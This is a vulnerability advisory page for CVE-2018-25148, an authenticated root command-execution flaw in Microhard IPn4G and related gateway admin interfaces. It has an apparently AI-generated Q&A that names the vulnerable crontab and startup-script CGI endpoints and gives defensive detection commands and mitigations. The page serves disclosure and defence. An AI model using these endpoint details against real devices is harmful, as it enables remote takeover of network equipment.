CVE-2018-25148
Authenticated Remote Code Execution in Microhard IPn4G Admin Interface
Publication date: 2025-12-24
Last updated on: 2025-12-24
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| microhard_systems | ipn4g | 1.1.0 |
| microhard_systems | ipn3gb | 2.2.0 |
| microhard_systems | vip4gb | 1.1.6 |
| microhard_systems | dragon-lte | 1.1.0 |
| microhard_systems | bullet-3g | 1.2.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-266 | A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability affects Microhard Systems IPn4G and related 3G/4G Cellular Ethernet and Serial Gateway devices. It involves multiple authenticated remote code execution flaws in the administrative interface, where attackers who have valid credentials can exploit hidden and undocumented features to create or modify crontab jobs and system startup scripts. This allows them to execute arbitrary commands with root privileges, effectively gaining full control over the device remotely. [1, 2]
How can this vulnerability impact me? :
If exploited, this vulnerability allows an attacker with authenticated access to execute arbitrary commands as the root user on the affected device. This can lead to a complete compromise of the device, including starting unauthorized services, disabling firewalls, writing files to the system, and potentially taking full control of the device and its network communications. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection can involve checking for unauthorized or suspicious crontab entries and modifications to system startup scripts on the affected devices. For example, you can inspect crontab jobs by running commands like `crontab -l` or checking system-wide crontabs in `/etc/crontab` and `/etc/cron.*` directories. Additionally, reviewing the contents of system startup scripts such as `/etc/init.d/firewall` or other startup files for unexpected changes can help. Monitoring web server logs for POST requests to endpoints like `/cgi-bin/webif/system-crontabs.sh` or `/cgi-bin/webif/system-startup.sh` may reveal exploitation attempts. Specific commands to detect suspicious activity include: `crontab -l`, `cat /etc/crontab`, `grep -r 'pwn.txt' /www/`, and reviewing web server access logs for POST requests to the mentioned CGI scripts. [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting authenticated access to the administrative interface to trusted users only, applying network-level access controls such as firewall rules to limit access to the device management interfaces, and monitoring for suspicious activity such as unauthorized crontab entries or startup script modifications. If possible, update the device firmware to a version that addresses these vulnerabilities. If no patch is available, consider disabling or restricting the vulnerable administrative web interface features. Additionally, changing default credentials and enforcing strong authentication can reduce the risk of exploitation. [1, 2]